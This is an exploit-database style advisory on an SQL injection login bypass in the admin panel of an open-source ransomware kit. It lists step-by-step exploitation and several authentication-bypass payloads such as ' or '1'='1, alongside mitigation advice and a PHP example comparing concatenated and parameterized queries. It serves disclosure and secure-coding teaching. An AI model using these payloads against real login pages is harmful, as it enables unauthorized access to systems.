Vendor: Jasmin Ransomware
By: Buğra Enis Dönmez
CVSS: 7.1 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Jasmin Ransomware
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2025

Jasmin Ransomware SQL Injection Login Bypass

The Jasmin Ransomware application is vulnerable to SQL injection, which allows an attacker to bypass authentication on the login page by inserting a specially crafted payload into the email and code fields. Entering the payload '=' 'or' in both the email and code fields bypasses authentication and gives unauthorized access to the admin panel.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs, use parameterized queries, and implement proper input validation to prevent SQL Injection attacks.
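
The parameterized-query recommendation above, as an added example that is not code from the Jasmin Ransomware project: a concatenated login query next to a prepared-statement version, run against a valid login and two of the payloads listed on this page. The `admins` table, its columns, the credentials and both function names are assumptions, and an in-memory SQLite database stands in for the application's real one.

```php
<?php
declare(strict_types=1);

// Added example. Schema, credentials and function names are assumptions for
// illustration; SQLite in memory stands in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (email TEXT NOT NULL, code TEXT NOT NULL)');
$db->exec("INSERT INTO admins VALUES ('admin@example.test', 'constructed-code')");

// Weak pattern: both fields become part of the SQL text, so a quote in the
// input changes the structure of the WHERE clause.
function login_concat(PDO $db, string $email, string $code): bool
{
    $sql = "SELECT COUNT(*) FROM admins WHERE email = '$email' AND code = '$code'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened pattern: the SQL text is fixed and the email travels as a bound
// parameter, so it is only ever compared as a value.
function login_prepared(PDO $db, string $email, string $code): bool
{
    $stmt = $db->prepare('SELECT code FROM admins WHERE email = :email LIMIT 1');
    $stmt->execute([':email' => $email]);
    $stored = $stmt->fetchColumn();
    // hash_equals compares the access code in constant time.
    return is_string($stored) && hash_equals($stored, $code);
}

// Constructed inputs: a valid login, a wrong code, and two payloads from this page.
$cases = [
    'valid credentials' => ['admin@example.test', 'constructed-code'],
    'wrong code'        => ['admin@example.test', 'nope'],
    "' or '1'='1"       => ["' or '1'='1", "' or '1'='1"],
    "' or 1 -- -"       => ["' or 1 -- -", "' or 1 -- -"],
];

foreach ($cases as $label => [$email, $code]) {
    printf("%-20s concat=%-5s prepared=%s\n", $label,
        var_export(login_concat($db, $email, $code), true),
        var_export(login_prepared($db, $email, $code), true));
}
```

The same two payload rows make a useful regression test for the login handler: any change that makes `login_prepared` return true for them means input has reached the SQL text again.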

Exploit-DB raw data:

# Exploit Title: Jasmin Ransomware SQL Injection Login Bypass
# Google Dork: N/A
# Date: 05-03-2025
# Exploit Author: Buğra Enis Dönmez
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: Windows

How to exploit :

--> Open Admin Panel Through : http://localhost/login.php

--> Enter the SQL Injection Auth Bypass Payload to Email like : '=' 'or'

--> And to Access Code, Enter the same SQL Injection Authentication Bypass Payload : '=' 'or'

--> Press Authorize

--> Congratz, you're in

--> SQL Injection Authentication Bypass Payload : '=' 'or'

--> Payloads that can be used:

' or '1'='1

' or ''='

'=' 'or'

' OR '1'='1';-- -

' or 1 -- -